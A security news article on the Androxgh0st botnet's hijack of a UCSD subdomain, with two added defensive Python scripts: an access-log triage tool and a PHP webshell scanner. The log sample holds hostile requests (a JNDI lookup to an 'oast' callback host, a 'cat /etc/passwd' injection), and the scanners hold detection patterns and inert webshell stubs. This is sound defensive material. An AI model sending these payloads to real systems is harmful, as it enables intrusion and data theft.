Androxgh0st Botnet Hijacks University Subdomain to Launch Global Cyber Attacks

A Dangerous Shift in Botnet Strategy

CloudSEK has revealed a troubling development in the world of cyber threats. The notorious Androxgh0st botnet, which has been active since early 2023, has recently taken a bold step by compromising an academic domain. This isn’t just another round of automated cyberattacks — this marks a strategic escalation. The attackers hijacked a legitimate subdomain belonging to the University of California, San Diego (UCSD), repurposing it into a command-and-control (C2) hub to manage their malicious activities. By leveraging the trust of a respected institution, they’ve managed to slip under the radar of many defenses and continue launching attacks on vulnerable systems around the world.

Botnet Evolution and New Exploits

Since March 2023, Androxgh0st has evolved into a complex threat actor, exploiting more than 20 distinct vulnerabilities across multiple platforms. CloudSEK's TRIAD team has tracked its attacks on widely used frameworks such as Apache Shiro, the Spring Framework (Spring4Shell), WordPress plugins, and a range of IoT devices. The attackers use these exploits to achieve remote code execution (RCE), inject malicious commands, and exfiltrate sensitive data. In a significant shift, the group recently took control of a subdomain tied to UCSD's "USArhythms" portal, linked to the USA Basketball Men's U19 National Team, and turned it into a C2 logging panel.

The logs show how diverse and sophisticated their tactics are. Attacks include JNDI and OGNL injections, Unix command injections like cat /etc/passwd, and exploiting CVEs like CVE-2019-17574 in the WordPress “Popup Maker” plugin. IoT exploits include leveraging CVE-2021-21881 in the Lantronix WLANScanSSID function, giving attackers control of connected devices. Meanwhile, Spring4Shell (CVE-2022-22965) and Apache Struts OGNL payloads enable attackers to manipulate Java runtime environments.

Alongside these attacks, the botnet deploys cryptomining malware using JSON-RPC requests to extract computational resources from infected machines. Its arsenal includes multiple webshells — from abuok.php with hex obfuscation, to myabu.php using ROT13 — each serving different purposes like file uploads, persistent access, and script injections.

The fact that Androxgh0st now uses a compromised academic subdomain for C2 functions marks a dangerous precedent. It not only allows for covert control and coordination of attacks but also tarnishes the credibility of educational institutions. CloudSEK warns that this level of threat needs immediate countermeasures: patching known vulnerabilities, monitoring for suspicious webshells, restricting RMI/LDAP/JNDI traffic, and deploying Web Application Firewalls (WAF) or Runtime Application Self-Protection (RASP) tools.

What Undercode Says:

Strategic Pivot in Botnet Behavior

The hijacking of UCSD's subdomain marks a tactical shift. Instead of simply scanning for random vulnerabilities, the operators now trade on trust in the way social engineering does, weaponizing the legitimacy of a university domain to make their operations stealthier. This helps them avoid detection and also raises the success rate of outbound C2 communication, because traffic to a trusted university host is less likely to be blocked.

Exploitation of Critical CVEs

The botnet’s exploitation library is vast and up-to-date. CVEs like Spring4Shell and Apache Shiro vulnerabilities are well-documented in the cybersecurity space, but the fact that attackers continue to successfully use them points to slow patch adoption across many systems. This paints a bleak picture of cybersecurity hygiene among website operators, especially in educational and IoT environments.

Cryptomining as a Revenue Model

The integration of cryptomining functionality into the botnet reflects a growing monetization strategy. By infecting large networks and harnessing CPU power via JSON-RPC calls to crypto pools, the attackers aren’t just stealing data — they’re building a passive income stream. This adds a financial incentive that sustains and grows the botnet infrastructure over time.

Webshell Deployment is Tactical, Not Random

The presence of multiple webshells isn’t just for redundancy. Each one serves a distinct role in the attack lifecycle — whether it’s data exfiltration, persistence, or remote control. The use of obfuscation techniques (ROT13, hex2bin, eval) shows that attackers are actively working to bypass conventional detection systems. This level of sophistication means defenders must adopt advanced anomaly detection tools rather than rely on signature-based antivirus or basic monitoring.

Reputational Risk to Academia

Hosting malware from academic domains damages institutional trust. Universities are now in the crosshairs not just for their data but for their branding. Once a domain is blacklisted, its online reputation and trustworthiness can plummet, affecting everything from admissions to research collaborations.

Weaknesses in IoT Security

The exploitation of devices like Lantronix PremierWave highlights how vulnerable IoT infrastructures remain. These devices often lack robust patching mechanisms, and once compromised, they provide stable, long-term footholds for attackers. The fact that a botnet can leverage IoT to amplify its reach is a wake-up call for industries that depend on connected tech.

Call for a Multi-layered Defense

This situation proves once again that patching alone isn’t enough. Multi-layered security — from endpoint detection and response (EDR) to WAF and behavioral analysis — must become standard, especially in sectors managing public-facing infrastructure. CloudSEK’s detection suggestions such as monitoring POST parameters and outbound traffic should be part of every SOC team’s strategy.
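CloudSEK's suggestion to monitor POST parameters and outbound traffic, together with the request patterns described earlier (JNDI and OGNL injection, Unix command injection, Spring4Shell class-loader parameters), can be turned into a first-pass access-log triage. The script below is an added example, not CloudSEK's or Undercode's code: the log lines, IP addresses and hostnames are constructed, and the rule list is a minimal illustration rather than a complete signature set.

```python
"""Triage web-server access-log lines for the request patterns the article
attributes to Androxgh0st: JNDI lookups, OGNL expressions, Spring4Shell
class-loader parameters and Unix command injection, plus callbacks to
out-of-band ("oast") hosts. Added example, not CloudSEK's or Undercode's
code; the log lines, IPs and hostnames are constructed for illustration."""

import re
from urllib.parse import unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Detection rules applied to the percent-decoded request line, referer and UA.
RULES = [
    ("jndi_lookup", re.compile(r"\$\{jndi:(?:ldap|rmi|dns)://", re.I)),
    ("ognl_expression", re.compile(r"%\{\s*\(?\s*#", re.I)),
    ("spring4shell_classloader", re.compile(r"class\.module\.classLoader", re.I)),
    ("unix_cmd_injection", re.compile(
        r"cat\s+/etc/passwd|(?:;|\|\||&&|`|\$\()\s*(?:id|whoami|uname)\b", re.I)),
]

# Hosts referenced inside the request (JNDI targets, redirect URLs, referers).
URL_HOST_RE = re.compile(r"(?:ldap|rmi|dns|https?)://([A-Za-z0-9.\-]+)", re.I)


def decode(value: str) -> str:
    # Decode twice: double percent-encoding is a common filter-evasion trick.
    return unquote(unquote(value))


def triage_line(line: str):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    haystack = " ".join(decode(m.group(f)) for f in ("target", "referer", "agent"))
    hits = [name for name, rx in RULES if rx.search(haystack)]
    hosts = sorted({h.lower() for h in URL_HOST_RE.findall(haystack)})
    # interactsh-style out-of-band domains carry "oast" as a DNS label.
    if any("oast" in h.split(".") for h in hosts):
        hits.append("oast_callback")
    return {"ip": m.group("ip"), "method": m.group("method"),
            "target": m.group("target"), "hits": hits, "callback_hosts": hosts}


def triage_log(text: str):
    """Return findings for every parseable line that triggered at least one rule."""
    findings = []
    for line in text.splitlines():
        f = triage_line(line)
        if f and f["hits"]:
            findings.append(f)
    return findings


# Constructed sample log (RFC 5737 test addresses, made-up hostnames).
SAMPLE_LOG = """\
203.0.113.10 - - [10/May/2025:10:01:02 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.oast.fun%2Fa%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/May/2025:10:01:05 +0000] "POST /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.12 - - [10/May/2025:10:01:09 +0000] "GET /?id=1;cat%20/etc/passwd HTTP/1.1" 500 0 "-" "curl/8.0"
203.0.113.13 - - [10/May/2025:10:01:12 +0000] "POST /login?class.module.classLoader.resources=x HTTP/1.1" 200 64 "-" "python-requests/2.31"
203.0.113.14 - - [10/May/2025:10:01:20 +0000] "GET /action?name=%25%7B(%23foo)%7D HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.5 - - [10/May/2025:10:02:00 +0000] "GET /about HTTP/1.1" 200 2048 "http://example.edu/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f["ip"], f["method"], f["hits"], f["callback_hosts"])
```

Two things the sample makes visible: the second line is a POST whose body never reaches the access log, so parameter inspection for POST traffic has to happen at the WAF or RASP layer the article recommends; and the last line shows that merely referencing an external host (the example.edu referer) is not a finding, only the "oast" label is.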

Lessons from the IOC Table

The Indicators of Compromise listed reveal not only the IPs and domains used but also demonstrate how attackers rotate infrastructure to avoid blocking. The consistent use of “oast” domains for exfiltration is a pattern that defenders should actively monitor and block. The inclusion of specific MD5 hashes for webshells is invaluable for incident response teams trying to retroactively scan logs.
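The webshell discussion above (ROT13, hex2bin and eval as obfuscation primitives) and the point about the IoC table's MD5 hashes both come down to the same triage task: score each PHP file in a webroot for suspicious primitives and compare its hash against the published list. The scanner below is an added example, not CloudSEK's or Undercode's tooling. The sample files are constructed and inert (the ROT13 and hex strings decode to placeholder text, not PHP), the file names are stand-ins for the ones the article lists, and the IoC set is built from one sample only so that the hash-match path runs offline; in practice it would be loaded from the report's table.

```python
"""Score PHP files for the webshell traits the article describes (eval fed
by ROT13/hex/base64 decoders, request-driven execution, file drops) and
match their MD5 against an IoC hash list. Added example, not CloudSEK's or
Undercode's tooling; the sample files are constructed and inert, and the
IoC set is built from one of them only to exercise the hash-match path."""

import hashlib
import re
from pathlib import Path

# Primitives that are harmless alone but telling in combination.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "str_rot13": re.compile(r"\bstr_rot13\s*\(", re.I),
    "hex2bin": re.compile(r"\bhex2bin\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "request_input": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "file_write": re.compile(r"\b(?:move_uploaded_file|file_put_contents|fwrite)\s*\(", re.I),
}
DECODERS = {"str_rot13", "hex2bin", "base64_decode"}


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verdict(hits: set, ioc_match: bool) -> str:
    if ioc_match:
        return "known_webshell"
    # eval over a decoder or over request input is the classic one-liner shell.
    if "eval" in hits and (hits & DECODERS or "request_input" in hits):
        return "likely_webshell"
    if len(hits) >= 2:
        return "suspicious"  # e.g. a genuine upload handler; needs a human look
    return "clean"


def triage_php(name: str, source: bytes, ioc_hashes=frozenset()) -> dict:
    text = source.decode("utf-8", errors="replace")
    hits = {k for k, rx in INDICATORS.items() if rx.search(text)}
    digest = md5_hex(source)
    return {"file": name, "md5": digest, "hits": sorted(hits),
            "verdict": verdict(hits, digest in ioc_hashes)}


def scan_tree(root: str, ioc_hashes=frozenset()) -> list:
    """Triage every *.php file under root (recursively)."""
    return [triage_php(str(p), p.read_bytes(), ioc_hashes)
            for p in Path(root).rglob("*.php")]


# Constructed, inert samples: the encoded strings decode to placeholder text.
SAMPLES = {
    "abuok.php": b'<?php $s = "CONSTRUCTED_NOT_HEX"; eval(hex2bin($s)); ?>',
    "myabu.php": b'<?php $c = str_rot13("PBAFGEHPGRQ_CYNPRUBYQRE"); eval($c); ?>',
    "upload.php": b'<?php move_uploaded_file($_FILES["f"]["tmp_name"], "uploads/" . basename($_POST["name"])); ?>',
    "index.php": b'<?php $page = htmlspecialchars($_GET["page"] ?? "home"); echo "<h1>$page</h1>"; ?>',
}

if __name__ == "__main__":
    # Stand-in IoC list built from one sample; load the real hashes from the report.
    ioc = {md5_hex(SAMPLES["abuok.php"])}
    for name, src in SAMPLES.items():
        r = triage_php(name, src, ioc)
        print(r["verdict"].ljust(16), r["md5"], name, r["hits"])
```

The upload.php sample is deliberately a legitimate-looking handler that still lands in the "suspicious" bucket, which is the reason the article argues for anomaly detection on top of signatures: string matches on function names are cheap to evade (variable functions, concatenated names), so this kind of scan is a triage aid for incident response, not a replacement for behavioural monitoring.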

🔍 Fact Checker Results:

✅ CloudSEK has confirmed the hijack of UCSD’s subdomain and its use as a C2 panel
✅ The botnet exploits more than 20 known CVEs including Spring4Shell and Apache Shiro
✅ Indicators of Compromise include live domains, IPs, and webshell MD5s verified by researchers

📊 Prediction:

🔮 Androxgh0st’s use of trusted infrastructure is likely to expand, with future attacks possibly targeting other academic or government institutions to bypass security filters. Cryptomining will remain a core monetization model, but the real danger lies in stealth persistence and long-term exploitation of unpatched, under-monitored systems. Expect a surge in similar subdomain hijacks unless security audits become routine across educational and public sector networks.

References:

Reported By: cyberpress.org